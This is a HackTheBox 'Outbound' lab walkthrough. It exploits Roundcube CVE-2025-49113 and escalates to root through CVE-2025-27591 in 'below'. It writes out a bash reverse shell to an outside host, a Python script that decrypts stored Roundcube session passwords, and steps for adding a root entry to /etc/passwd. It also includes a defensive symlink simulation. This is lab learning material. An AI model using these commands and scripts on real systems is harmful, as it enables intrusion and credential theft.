Outbound HTB Walkthrough / Solution — Exploiting Roundcube Webmail CVE-2025–49113 and Rooting via…
In the HackTheBox lab Outbound, the author uses Nmap and Nuclei to discover and exploit a vulnerability in the Roundcube server (CVE-2025-49113) and obtain a low-privileged shell. Database enumeration and session decryption then yield a user password, which is used to log in over SSH and switch users. Finally, a second vulnerability (CVE-2025-27591) is used to escalate privileges to root and read the root flag. Published 2025-12-10 14:01:42. Source: infosecwriteups.com

Death Esther

Introduction

In this HackTheBox lab, Outbound, I explored a real-world scenario involving a Roundcube webmail server. The objective was to perform end-to-end penetration testing from initial enumeration and vulnerability discovery to exploitation, credential harvesting, and ultimately gaining root access.

Reconnaissance

I began the engagement by performing a comprehensive Nmap scan to identify open ports and running services on the target machine.

nmap 10.10.11.77 -sV -A

The results were as follows:

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The scan revealed two active services:

  • SSH (port 22) — a potential remote login point.
  • HTTP (port 80) — a web server running nginx 1.24.0, which redirected to the domain mail.outbound.htb.

To correctly interact with the web application, I updated my /etc/hosts file to resolve the domain to the target IP:

echo "10.10.11.77 mail.outbound.htb" | sudo tee -a /etc/hosts

This ensured that mail.outbound.htb resolved to the target, enabling further web enumeration.

Exploitation

After logging in to the web application with the credentials HackTheBox provides for this lab (user tyler, password LhKL1o9Nm3X2), I observed that the mailbox was completely empty.


To identify potential vulnerabilities, I used Nuclei, a fast and configurable vulnerability scanner developed by ProjectDiscovery. I ran the following command:

nuclei -u http://mail.outbound.htb -tags cves

Note: Nuclei detects known vulnerabilities, misconfigurations, CVEs and exposures in web applications, APIs and servers from a library of YAML templates, so the templates must be kept current (nuclei -update-templates) or recent CVEs such as this one will not be flagged.

The scan flagged a critical vulnerability:

[CVE-2025-49113:version_check] [http] [critical] http://mail.outbound.htb/ ["Roundcube Version: 1.6.10"]

This indicated that the target was running a Roundcube Webmail version vulnerable to Remote Code Execution. CVE-2025-49113 is a PHP object deserialization flaw, fixed in Roundcube 1.6.11 and 1.5.10, and it is post-authentication: a valid mailbox login is required, which is why tyler's credentials matter.

Exploiting CVE-2025–49113

I proceeded with the exploit:

  1. Clone the exploit repository:

git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit
cd CVE-2025-49113-exploit

  2. Install the PHP CLI the exploit is written in:

sudo apt install php-cli

  3. The exploit takes the target URL, a valid login and the command to execute on the server. I used a bash reverse shell back to my attacking machine as the command:

php CVE-2025-49113.php http://mail.outbound.htb <username> <password> "bash -c 'bash -i >& /dev/tcp/<your-ip>/<port> 0>&1'"

  4. Start a Netcat listener on my local machine on the chosen port:

nc -lnvp 4444

  5. Run the exploit with tyler's credentials and the listener address:

php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 "bash -c 'bash -i >& /dev/tcp/10.10.14.59/4444 0>&1'"

The tool confirmed:

[+] Starting exploit (CVE-2025-49113)...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10610
[+] Target is vulnerable!
[+] Login successful!
[*] Exploiting...

Shortly after, the reverse shell connected to my listener:

Listening on 0.0.0.0 4444
Connection received on 10.10.11.77 47002
bash: no job control in this shell
www-data@mail:/$

At this stage, I had successfully obtained a low-privileged shell as www-data on the target system.

Post-Exploitation: Database Enumeration

After obtaining a low-privileged shell on the target, I started enumerating the Roundcube Webmail configuration files. Accessing the configuration allowed me to identify critical credentials stored on the system. I navigated to the Roundcube config directory and read the main configuration file:

cat /var/www/html/roundcube/config/config.inc.php

From the file, I discovered the MySQL database credentials:

Database user: roundcube
Database password: RCDBPass2025
Database host: localhost
Database: roundcube

Additionally, I confirmed that MySQL was running on its default port 3306, giving me an opportunity to query the database directly.

Enumerating Active Sessions

Using the retrieved credentials, I connected to the Roundcube database to enumerate active user sessions:

mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e "use roundcube; select * from session;" -E

The output revealed the session ID, client IP and serialized session variables for every session Roundcube still held, including one belonging to jacob:

*************************** 2. row ***************************
sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
ip: 172.17.0.1
vars: bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7
user_id: 1
username: jacob

Decoding Session Data

The session data retrieved from the Roundcube database is stored encoded, so to extract meaningful information such as usernames, session tokens and potentially passwords, I used CyberChef for decoding and decryption.

Base64-decoding the vars column gives Roundcube's PHP session: a sequence of name|value entries in PHP's serialize() format. Two entries in jacob's session matter here, username|s:5:"jacob" and a password entry, which holds the user's IMAP password as Roundcube stored it, encrypted and then Base64-encoded:

L7Rv00A8TuwJAr67kITxxcSgnIk25Am/

From the config.inc.php file, I had already noted the Roundcube encryption key:

rcmail-!24ByteDESkey*Str

This key is essential for decrypting session data and user credentials. After researching Roundcube’s encryption mechanism, I confirmed it uses Triple-DES (DES-EDE3-CBC) for encrypting sensitive values.

Preparing the Data for Decryption

Roundcube's encrypt routine generates a random IV, prepends it to the ciphertext and Base64-encodes the result, so the decryption inputs come straight out of the decoded bytes. Before decryption, the 32-character Base64 string must therefore be decoded to its 24 raw bytes (shown here as hex), which is the input form the Triple-DES operation needs.

The decryption also requires the initialization vector (IV). For DES-EDE3-CBC the IV is 8 bytes long, and it is simply the first 8 bytes of the decoded data; the remaining 16 bytes are the ciphertext (the password, PKCS#7-padded to a multiple of the 8-byte block size):

IV: 2f b4 6f d3 40 3c 4e ec
Input (hex): 09 02 be bb 90 84 f1 c5 c4 a0 9c 89 36 e4 09 bf

Decrypting in CyberChef

Using the above IV and the encryption key, I configured CyberChef to:

  1. Convert the Base64 session string to hex.
  2. Apply Triple-DES (DES-EDE3-CBC) decryption with the known key and IV.

This process successfully revealed Jacob’s password and other session information, enabling further exploitation such as session hijacking or lateral movement on the target machine.
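The CyberChef steps above, as an added example that is not part of the original write-up: a Python script that does the same recovery end to end. It Base64-decodes the session vars column, parses Roundcube's PHP-session serialization to pull out username and password, splits the stored value into IV and ciphertext exactly as rcube::encrypt() lays them out, and hands the DES-EDE3-CBC decryption to the openssl command-line tool, since the Python standard library has no 3DES. The session blob embedded below is a constructed, shortened version of jacob's real vars value from the table above; the field names, the key and the encrypted value are the ones on the page.

```python
import base64
import subprocess

# Roundcube's shipped default des_key, which is the key found in the target's
# config.inc.php above. DES-EDE3-CBC uses an 8-byte IV, which rcube::encrypt()
# prepends to the ciphertext before Base64-encoding the whole thing.
DES_KEY = b"rcmail-!24ByteDESkey*Str"
IV_LEN = 8

# Constructed sample: a shortened version of the real `vars` column shown above,
# keeping the fields that matter. Roundcube stores the PHP session as
# `name|<php-serialized value>` entries and Base64-encodes the result.
_SAMPLE_SESSION = (
    b'language|s:5:"en_US";user_id|i:1;username|s:5:"jacob";'
    b'storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|b:0;'
    b'password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;'
    b'unseen_count|a:2:{s:5:"INBOX";i:2;s:5:"Trash";i:0;}'
)
SAMPLE_VARS = base64.b64encode(_SAMPLE_SESSION).decode()


def _parse_value(buf: bytes, pos: int):
    """Parse one PHP-serialized value starting at buf[pos]; return (value, next_pos)."""
    t = buf[pos:pos + 1]
    if t == b"N":                                   # N;
        return None, pos + 2
    if t == b"b":                                   # b:0; or b:1;
        return buf[pos + 2:pos + 3] == b"1", pos + 4
    if t == b"i":                                   # i:123;
        end = buf.index(b";", pos)
        return int(buf[pos + 2:end]), end + 1
    if t == b"s":                                   # s:LEN:"bytes";  LEN is a byte count
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start = colon + 2                           # skip :"
        value = buf[start:start + length].decode("utf-8", "replace")
        return value, start + length + 2            # skip ";
    if t == b"a":                                   # a:COUNT:{key value key value ...}
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        pos = colon + 2                             # skip :{
        items = {}
        for _ in range(count):
            key, pos = _parse_value(buf, pos)
            items[key], pos = _parse_value(buf, pos)
        return items, pos + 1                       # skip }
    raise ValueError(f"unsupported serialized type {t!r} at offset {pos}")


def parse_session(vars_b64: str) -> dict:
    """Decode Roundcube's session `vars` column into a Python dict."""
    buf = base64.b64decode(vars_b64)
    pos, session = 0, {}
    while pos < len(buf):
        bar = buf.index(b"|", pos)
        name = buf[pos:bar].decode()
        session[name], pos = _parse_value(buf, bar + 1)
    return session


def split_cipher(password_b64: str) -> tuple[bytes, bytes]:
    """Split rcube::encrypt() output into (iv, ciphertext)."""
    raw = base64.b64decode(password_b64)
    return raw[:IV_LEN], raw[IV_LEN:]


def decrypt_3des_cbc(iv: bytes, ciphertext: bytes, key: bytes = DES_KEY) -> str:
    """DES-EDE3-CBC decrypt with PKCS#7 unpadding, delegated to the openssl CLI."""
    result = subprocess.run(
        ["openssl", "enc", "-d", "-des-ede3-cbc", "-K", key.hex(), "-iv", iv.hex()],
        input=ciphertext, capture_output=True, check=True,
    )
    return result.stdout.decode()


def recover_password(vars_b64: str) -> tuple[str, str]:
    """Return (username, cleartext password) from a session `vars` blob."""
    session = parse_session(vars_b64)
    iv, ct = split_cipher(session["password"])
    return session["username"], decrypt_3des_cbc(iv, ct)


if __name__ == "__main__":
    user, password = recover_password(SAMPLE_VARS)
    print(f"{user}:{password}")
```

To use it against a live dump, paste the full vars column from the session table into recover_password(); the parser slices strings by their declared byte length, so quotes or semicolons inside values do not confuse it. The same routine decrypts anything else Roundcube protects with des_key, which is why leaving the shipped default in place turns a database read into a credential dump.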


Switching to Jacob

After successfully decrypting the session data, I retrieved Jacob's password:

595mO8DmwGeD

With this credential, I performed a user switch to assume Jacob’s account on the target system:

su jacob

Post-Exploitation: SSH Credential Discovery and Access

After switching to Jacob’s account, I performed a directory enumeration and discovered an email containing SSH credentials in his mailbox:

cat /home/jacob/mail/INBOX/jacob

The email from Mel indicated a recently enabled resource monitoring system and included the updated password for Jacob’s SSH account:

Username: jacob
Password: gY4Wr3a1evp4

With these credentials, I was able to connect to the target system via SSH:

ssh jacob@10.10.11.77

When prompted, I entered the password extracted from the email. Authentication succeeded, granting me a remote SSH session as Jacob, which provided a more stable and interactive shell for further enumeration and potential privilege escalation.

Retrieving the User Flag

After successfully establishing an SSH session as Jacob, I proceeded to locate the user flag on the system. Using the standard search for HackTheBox-style flags, I ran:

find / -type f -name "user.txt" 2>/dev/null

This command located the user flag in Jacob’s home directory. Displaying its contents confirmed successful retrieval:

cat /home/jacob/user.txt

At this point, I had successfully captured the user flag, completing the initial compromise of the system.

Privilege Escalation: Exploiting CVE-2025–27591

After retrieving the user flag, I checked the sudo privileges for Jacob to identify potential paths for privilege escalation:

sudo -l

The output revealed that Jacob could run the below utility as root, with any arguments except a few excluded ones, without a password:

(ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*

The rule is a deny list: it blocks the --config, --debug and -d options but leaves every other below subcommand, including record, runnable as root. After research, I identified CVE-2025-27591, a local privilege escalation in below versions before 0.9.0 caused by its log handling: below creates its log directory /var/log/below world-writable and follows symlinks when it writes its log files, so an unprivileged user can redirect a root-owned write to an arbitrary file.

Exploiting the Vulnerability

I located a publicly available proof-of-concept exploit for this CVE:

https://github.com/BridgerAlderson/CVE-2025-27591-PoC/blob/main/exploit.py

I transferred the exploit to the target, edited it if necessary, and executed it as Jacob:

nano exploit.py
python3 exploit.py

The exploit performed the following steps:

  1. Verified that /var/log/below was world-writable.
  2. Removed the existing log file and created a symlink to /etc/passwd.
  3. Triggered the below record command to append a malicious root entry.
  4. Switched to a root shell via the newly created user.
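To make the mechanism concrete, here is an added simulation that is not from the write-up or the PoC: it reproduces the bug class the steps above rely on inside a temporary directory, with a throwaway file standing in for /etc/passwd and a plain Python function standing in for the root-owned writer. The log file name and the passwd line are placeholders of my own. The second run shows the fix a privileged logger should apply: opening the log with O_NOFOLLOW, so a symlink planted by an unprivileged user in a world-writable directory is refused instead of followed.

```python
import errno
import os
import tempfile

# Shape of a root-equivalent passwd entry (uid 0); the name and empty password
# field are placeholders for this simulation, not the PoC's actual payload.
PASSWD_LINE = "pwned::0:0::/root:/bin/bash\n"
ORIGINAL_PASSWD = "root:x:0:0:root:/root:/bin/bash\n"


def privileged_append(log_path: str, line: str, follow_symlinks: bool) -> bool:
    """Model the root-owned writer appending to its log. Returns True if written.

    follow_symlinks=True mirrors the vulnerable open(): the kernel resolves the
    symlink and the write lands in whatever file it points at. False adds
    O_NOFOLLOW, which makes open() fail with ELOOP when the final path
    component is a symlink, so the planted link is refused."""
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT
    if not follow_symlinks:
        flags |= os.O_NOFOLLOW
    try:
        fd = os.open(log_path, flags, 0o644)
    except OSError as e:
        if e.errno == errno.ELOOP:
            return False
        raise
    with os.fdopen(fd, "w") as f:
        f.write(line)
    return True


def simulate(follow_symlinks: bool) -> tuple[bool, str]:
    """Run the attack once in a scratch directory; return (written, target contents)."""
    with tempfile.TemporaryDirectory() as scratch:
        logdir = os.path.join(scratch, "below")        # stands in for /var/log/below
        target = os.path.join(scratch, "target")       # stands in for /etc/passwd
        log = os.path.join(logdir, "record.log")       # placeholder log file name

        os.mkdir(logdir, 0o777)                        # the bug: world-writable log dir
        with open(target, "w") as f:
            f.write(ORIGINAL_PASSWD)
        with open(log, "w"):                           # a legitimate log already exists
            pass

        # Unprivileged attacker: remove the log and replace it with a symlink.
        os.remove(log)
        os.symlink(target, log)

        # Privileged writer logs a line the attacker chose; with follow_symlinks=True
        # it is appended to the target file instead of the log.
        written = privileged_append(log, PASSWD_LINE, follow_symlinks)
        with open(target) as f:
            return written, f.read()


if __name__ == "__main__":
    for follow in (True, False):
        written, contents = simulate(follow)
        print(f"follow_symlinks={follow}: written={written}\n{contents}")
```

O_NOFOLLOW only protects the last path component; a privileged program that must log under a directory other users can write to should also refuse to start when that directory is world-writable, or better, keep its logs in a root-owned directory, which is the shape of the upstream fix for this class of bug.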

Upon successful exploitation, I obtained a root shell. Note that this PoC rewrites /etc/passwd; outside a disposable lab box, back the file up first and remove the added entry afterwards, since a broken passwd file can lock everyone out.

root@outbound:/home/jacob#

Retrieving the Root Flag

Finally, I retrieved the root flag to complete the capture-the-flag objective:

cat /root/root.txt

This confirmed full system compromise and completion of the exercise.

For more detailed walkthroughs and write-ups, check out my GitHub


Source: https://infosecwriteups.com/outbound-htb-walkthrough-solution-exploiting-roundcube-webmail-cve-2025-49113-and-rooting-via-d0d54f071691?source=rss----7b722bfd1b8d---4